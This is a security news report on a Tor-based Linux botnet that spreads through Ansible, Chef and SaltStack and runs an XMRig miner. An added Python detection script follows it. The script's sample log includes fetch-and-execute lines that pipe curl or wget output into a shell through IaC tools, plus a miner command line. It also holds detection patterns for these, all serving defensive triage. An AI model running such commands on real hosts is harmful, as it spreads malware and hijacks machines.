
Tor-Based Linux Botnet Abuses IaC Tools to Spread

A recently observed botnet targeting Linux systems combines several techniques now spreading among cyber-criminals: Tor proxies for payload delivery, abuse of legitimate DevOps tools, and the removal of competing malware, according to new research from anti-malware vendor Trend Micro.

The researchers say the malware is capable of downloading all of the files it needs from the Tor anonymity network, including post-infection scripts and legitimate, essential binaries that might be missing from the environment, such as ss, ps, and curl.

With these tools in place, the malware can make HTTP requests (curl), enumerate running processes (ps) and open network sockets (ss), and so gather information about the infected system without depending on anything the host already provides.

To carry out the attacks, the threat actor behind the botnet runs a large network of proxies that bridge the surface web and the Tor network.

Besides relaying requests into Tor, the proxies pass on information about the victim system, including its IP address, CPU architecture and username, along with part of the uniform resource identifier (URI), which is used to determine which architecture-specific binary the host should download.

The abused proxy servers expose vulnerable services, suggesting they were compromised without their owners' knowledge. During the investigation, Trend Micro's researchers observed that the proxy service on any given host was invariably disabled after a while.

The malware supports a wide range of system architectures; its initial script performs several checks on the target before downloading additional files and continuing the infection process.

Given that breadth, Trend Micro believes the threat actor behind the botnet may be preparing a broader campaign against Linux systems.

The observed sample can also remove certain cloud-related services and agents, and it abuses infrastructure-as-code (IaC) tools such as Ansible, Chef, and SaltStack to spread to other systems. Since these tools exist to run commands across every host they manage, a compromised control node doubles as a ready-made lateral-movement platform.

At present, the botnet deploys the XMRig Monero (XMR) miner on infected machines. The miner is pointed at the operator's own mining pool, and the malware searches the system for other running miners and attempts to remove them so that it has the host's CPU to itself.


“This malware sample does not need other software; the Linux operating system is the only requirement for the malware to run and spread. It downloads the essential tools (ss, ps, curl) because not every environment targeted for infection has them and it’s likely that the user doesn’t have the necessary permissions to install them on the system (as in the case of containers),” Trend Micro added.
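The three behaviours described above (dropped copies of ps, ss and curl; IaC tools driven to fetch and execute code on managed hosts; an XMRig-style miner) each leave a recognisable mark in process-execution telemetry. The Python below is an added example of a host-side triage pass over such records; it is not Trend Micro's or SecurityWeek's code. The `pid=... user=... exe=... cmd=...` record layout, every sample line, and the indicator lists are constructed assumptions to be tuned to a real environment, and the heuristic that ps, ss and curl should only run from the distribution's bin directories is an editorial assumption, not something the research states.

```python
import os
import re
import shlex
from dataclasses import dataclass

# Tools the article says the malware fetches itself when the host lacks them.
# Assumption: on a sane host they run only from the distribution's bin dirs.
DROPPED_TOOLS = {"ps", "ss", "curl"}
TRUSTED_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin"}

# IaC front-ends whose argument string is executed on every managed host.
IAC_TOOLS = {"ansible", "ansible-playbook", "salt", "salt-call", "salt-ssh",
             "knife", "chef-client"}

# Payload traits that turn an orchestration run into fetch-and-execute.
PAYLOAD_PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b"),
    "tor_onion": re.compile(r"\.onion\b"),
    "socks_proxy": re.compile(r"socks[45]h?://"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}

# Command-line traits of XMRig-style miners (constructed indicator list).
MINER_PATTERNS = {
    "xmrig_binary": re.compile(r"\bxmrig\b", re.I),
    "stratum_pool": re.compile(r"stratum\+(?:tcp|ssl)://"),
    "donate_level": re.compile(r"--donate-level\b"),
}

# Constructed record layout; a real pipeline would read auditd/eBPF exec events.
RECORD_RE = re.compile(r"^pid=(\d+)\s+user=(\S+)\s+exe=(\S+)\s+cmd=(.*)$")


@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    category: str  # dropped_tool | iac_remote_exec | cryptominer
    reason: str
    cmd: str


def _argv(cmd):
    """Split like a shell so a quoted payload stays one token."""
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes: degrade to whitespace split
        return cmd.split()


def _first_match(patterns, text):
    for name, rx in patterns.items():
        if rx.search(text):
            return name
    return None


def triage_record(line):
    """Classify one exec record; returns a Finding or None."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    pid, user, exe, cmd = int(m.group(1)), m.group(2), m.group(3), m.group(4)
    name, where = os.path.basename(exe), os.path.dirname(exe)

    # 1. ps/ss/curl executed from outside the distribution's bin directories.
    if name in DROPPED_TOOLS and where not in TRUSTED_BIN_DIRS:
        return Finding(pid, user, "dropped_tool", f"{name} run from {where}", cmd)

    # 2. IaC tool whose payload string fetches and executes code on targets.
    argv = _argv(cmd)
    if argv and os.path.basename(argv[0]) in IAC_TOOLS:
        reason = _first_match(PAYLOAD_PATTERNS, " ".join(argv[1:]))
        if reason:
            return Finding(pid, user, "iac_remote_exec", reason, cmd)

    # 3. Miner command line, whatever the binary was renamed to.
    reason = _first_match(MINER_PATTERNS, cmd)
    if reason:
        return Finding(pid, user, "cryptominer", reason, cmd)
    return None


def triage(lines):
    return [f for f in map(triage_record, lines) if f is not None]


# Constructed sample records, not real telemetry.
SAMPLE_LOG = """\
pid=4101 user=root exe=/usr/bin/ansible-playbook cmd=ansible-playbook -i inventory site.yml
pid=4102 user=root exe=/usr/bin/ansible cmd=ansible all -m shell -a "curl -x socks5h://127.0.0.1:9050 http://example.onion/i.sh | sh"
pid=4103 user=deploy exe=/usr/bin/salt cmd=salt '*' cmd.run 'wget -qO- http://198.51.100.7/x.sh | bash'
pid=4104 user=root exe=/usr/bin/curl cmd=curl -sS https://repo.example.com/key.gpg
pid=4105 user=root exe=/tmp/.dir/curl cmd=curl http://198.51.100.7/p
pid=4106 user=nobody exe=/tmp/.dir/x cmd=x -o stratum+tcp://pool.example.net:3333 -u wallet --donate-level 0
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"pid={f.pid} user={f.user} {f.category} ({f.reason}): {f.cmd}")
```

The ordering of the checks matters: the miner rule runs last and looks at the whole command line rather than the binary name, because the article notes the sample renames nothing it needs to and a renamed XMRig still has to be told its pool. The IaC rule inspects only the argument string handed to the tool, so an ordinary playbook run with no fetch-and-execute payload is not flagged.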

Written By

Ionut Arghire is an international correspondent for SecurityWeek.